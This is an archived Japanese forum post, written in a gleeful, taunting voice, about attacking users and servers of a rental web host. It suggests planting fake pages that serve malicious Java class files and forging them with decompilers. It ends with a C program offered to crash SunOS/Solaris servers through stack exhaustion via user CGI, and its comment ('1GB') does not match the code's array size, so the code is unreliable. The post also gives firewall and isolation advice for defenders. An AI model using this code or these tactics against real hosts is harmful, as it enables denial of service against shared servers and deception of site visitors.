戻る ※過去ログ・転載/引用専門です。
■ www.rental-web.comの うひーひひひ 他のページに偽物でっち上げて、ひーひひひ
偽のClass Fileを いひーひひひ 哀れな方々にごちそうするという手が簡単で ひーひひひ。
Class Fileを実行させてやるだけで良い。 セキュリティモデル的に これは防げない。
xtel 攻撃も同様に可能。 アカウント1個 ぶっ飛ばす覚悟でやるんなら この程度。ひひっ
Javaの 逆コンパイラは mochaが有名だが、最近どこにいったか わからない。ひひっ
KlassMaster もいい感じ。遅いけどね。 ひーひひひ
とりあえず、ふつー に見にいって class ファイル引っこ抜いてきて 解析して 偽物
でっち上げる用途には KlassMaster かな。そこまでして 壊す理由なんて ないん
だろうけどね。CGI を利用者に開放するというのは、根本的に ガタガタなのよん。
内側からの port 80、8080、10080、8000、3126 などへの TCP Connnection を
全部塞ぐように設定しないと、潜在的な迷惑サイトへの道が待ってるですな。
もちろん、21,23,25 他もね。 外から見える Webサーバ自体は Delegateなどで
隔離病棟への中継を行わせて、外向けWebと 隔離病棟間の Connectionは片側
一方向(もちろん、Web>隔離病棟)にしないと、隔離病棟から 病人達が他のサイト
を 銃で撃ったり、他色々。 ひひっ
一台で構成できない事も無いけど、かなり面倒ね。 うひーひひひ
■ CGIを開放しているサーバでCコンパイラ使える場合なら・・・
#define MAX_SIZE 137438953472
main()
{
int i;
double a;
double b[MAX_SIZE]; /* 1GBのスタックを確保 */
/* このループを実行すれば、サーバのOSがSunOSまたはSolaris */
/* ならスタック・オバーフローでOSを道連れにぶっ飛ばせます */
/* ダメだったら、MAX_SIZEを大きくすればいいよ。 */
for (i=0; i<MAX_SIZE;i++) {
a = b[i];
}
}